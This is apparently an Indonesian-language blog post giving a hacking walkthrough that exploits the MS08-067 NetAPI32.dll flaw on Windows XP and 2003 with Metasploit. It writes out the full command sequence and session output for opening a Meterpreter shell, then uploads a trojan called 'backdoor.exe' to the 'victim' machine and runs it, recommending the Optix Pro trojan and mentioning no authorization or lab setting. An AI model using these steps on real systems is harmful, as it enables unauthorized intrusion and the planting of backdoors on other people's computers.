i kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu)
Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya.....
- Senjata yang harus anda siapkan yaitu metasploit dengan update terbaru
- siapkan sebuah trojan Optix Pro atau Trojan buatan anda sendiri
- software untuk melakukan scanning Ip atau port misalnya "SUPERSCAN"
- kopi susu +Snack
- Ok Let's see
- Pertama Pilih modul exlpoitnya, seperti berikut :
msf > use windows/smb/ms08_067_netapi
- untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :
msf exploit(ms08_067_netapi) > show options
- lalu anda set target misalnya target kita 192.168.2.xxx
msf>exploit(ms08_067_netapi) > set RHOST 192.168.2.xxx
- kemudian anda set PAYLOAD
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih "windows/meterpreter/bind_tcp", maksudnya kita akan mengambil alih Shell metarpreternya dari target hacking kita.
- Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.
- kemudian tinggal jalankan EXPLOIT-nya :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.2.xxx:4444) Meterpreter >
- Tahap selanjutnya adalah bagaimana cara kita mengupload sebuah trojan atau virus ke dalam system korban misalnya trojan yang saya buat bernama "trojan.exe"yang terletak di Directory c:\trojan.exe(komputer attackers) yang akan kita upload ke "Directory c:\"(komputer victim/korban kita) maka perintah yang kita ketik
Meterpreter > upload c:/backdoor.exe c:\
[*] Uploading :c:/backdoor.exe ->c:\
[*] Uploaded :c:/backdoor.exe ->c:\\backdoor.exe
- Setelah Trojan berhasil di upload ke komputer Victim maka tahap selanjutnya fase eksekusi trojan yang kita upload tadi
Meterpreter >cd c:
Meterpreter >execute -f backdoor.exe
Process 3328 created
- Ok trojan berhasil di eksekusi selanjutnya terserah anda....
Tidak ada komentar:
Posting Komentar